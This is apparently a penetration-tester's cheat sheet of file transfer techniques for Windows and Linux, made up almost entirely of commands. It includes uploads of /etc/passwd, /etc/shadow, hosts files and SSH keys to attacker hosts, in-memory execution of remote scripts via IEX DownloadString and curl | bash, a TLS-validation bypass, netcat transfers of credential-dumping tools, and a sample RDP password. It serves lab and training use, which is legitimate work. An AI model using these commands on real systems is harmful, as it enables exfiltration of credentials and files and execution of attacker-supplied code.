File Transfer Techniques

🔧 Living Off The Land (LOLBAS & GTFOBins)

Use native system binaries to transfer files stealthily.

LOLBAS:
GTFOBins:

🪟 Windows File Transfer Methods

✅ Hash Checking

# Linux
md5sum id_rsa

# PowerShell
Get-FileHash C:\Users\Public\id_rsa -Algorithm MD5

🔐 Base64 Encode/Decode

# Encode (Linux)
cat id_rsa | base64 -w 0; echo

# Encode (PowerShell)
[Convert]::ToBase64String((Get-Content -Path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

# Decode (PowerShell)
[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("<base64String>"))

# Decode (Linux)
echo <base64String> | base64 -d > hosts

🌐 PowerShell File Download

powershellCopyEdit(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
(New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
Invoke-WebRequest <Target File URL> -OutFile PowerView.ps1

📦 SMB File Transfer

# Set up SMB Server
sudo impacket-smbserver share -smb2support /tmp/smbshare
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

# Download from SMB Server
copy \\192.168.220.133\share\nc.exe C:\Temp\nc.exe

# Upload to SMB Server
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

📁 WebDAV File Transfer

# Set up WebDAV Server
sudo pip3 install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

# Access WebDAV
dir \\192.168.49.128\DavWWWRoot

# Upload
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

📡 FTP Transfer

# Set up FTP Server
sudo pip3 install pyftpdlib
sudo python3 -m pyftpdlib --port 21

powershellCopyEdit# Download
(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')

# Upload
(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

⬆️ Upload Server

pip3 install uploadserver
python3 -m uploadserver

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

💡 Base64 Upload via Web

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

nc -lvnp 8000 # Catch the file

🧨 Fileless Execution (Memory)

IEX (New-Object Net.WebClient).DownloadString('<Target File URL>')
(New-Object Net.WebClient).DownloadString('<Target File URL>') | IEX

🚫 Bypass Protections

# IE Config Bypass
Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX

# SSL/TLS Error Bypass
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

🐧 Linux File Transfer Methods

✅ MD5 Hash Check

md5sum id_rsa

🔐 Base64 Encode/Decode

# Encode
cat id_rsa | base64 -w 0; echo

# Decode
echo -n '<base64String>' | base64 -d > id_rsa

🌐 Download Tools

wget <url> -O <output-file>
curl -o <output-file> <url>

📡 TCP-Based Download

exec 3<>/dev/tcp/10.10.10.32/80
echo -e "GET /LinEnum.sh HTTP/1.1\n\n" >&3
cat <&3

🔄 SCP (SSH Transfer)

# Download
scp plaintext@192.168.49.128:/root/myroot.txt /home/myuser/myroot.txt

# Upload
scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/

🧾 Upload Server with Certificate

sudo python3 -m pip install --user uploadserver
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

🌐 Web Servers

python3 -m http.server
python2.7 -m SimpleHTTPServer
php -S 0.0.0.0:8000
ruby -run -ehttpd . -p8000

🧨 Fileless Download

curl <url> | bash
wget -qO- <url> | python3

👨‍💻 Transferring Files with Scripting Languages

🐍 Python

# Download
python2.7 -c 'import urllib;urllib.urlretrieve ("<url>", "LinEnum.sh")'
python3 -c 'import urllib.request;urllib.request.urlretrieve("<url>", "LinEnum.sh")'

# Upload
python3 -m uploadserver
python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})'

🐘 PHP

# Download
php -r '$file = file_get_contents("<url>"); file_put_contents("LinEnum.sh",$file);'
php -r 'const BUFFER = 1024; $fremote = fopen("<url>", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

# Execute in Bash
php -r '$lines = @file("<url>"); foreach ($lines as $line_num => $line) { echo $line; }' | bash

💎 Ruby

ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("<url>")))'

🐪 Perl

perl -e 'use LWP::Simple; getstore("<url>", "LinEnum.sh");'

🧠 JavaScript (wget.js)

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

bashCopyEditcscript.exe /nologo wget.js <url> PowerView.ps1

📜 VBScript (wget.vbs)

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

cscript.exe /nologo wget.vbs <url> PowerView2.ps1

🧰 Miscellaneous File Transfer

🔊 Netcat

# Listener
nc -l -p 443 > SharpKatz.exe
ncat -l -p 443 --recv-only > SharpKatz.exe

# Sender
nc -q 0 192.168.49.128 443 < SharpKatz.exe
ncat --send-only 192.168.49.128 443 < SharpKatz.exe

📂 Mount Linux Directory (RDP)

xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'

🌐 Upload with Nginx (WebDAV)

sudo mkdir -p /var/www/uploads/SecretUploadDirectory
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory

# Create config
sudo bash -c 'cat > /etc/nginx/sites-available/upload.conf <<EOF
server {
    listen 9001;
    location /SecretUploadDirectory/ {
        root    /var/www/uploads;
        dav_methods PUT;
    }
}
EOF'

sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
sudo rm /etc/nginx/sites-enabled/default
sudo systemctl restart nginx.service
tail -2 /var/log/nginx/error.log

# Upload test
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt
sudo tail -1 /var/www/uploads/SecretUploadDirectory/users.txt

🔐 File Protection with Encryption

PowerShell – AES Encryption

Import-Module .\Invoke-AESEncryption.ps1

# Encrypt
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\scan-results.txt

# Decrypt
Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Path file.aes

OpenSSL – AES Encryption

# Encrypt
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc

# Decrypt
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd

PreviousPortforwarding and tunneling NextPassword Attacks

Last updated 28 days ago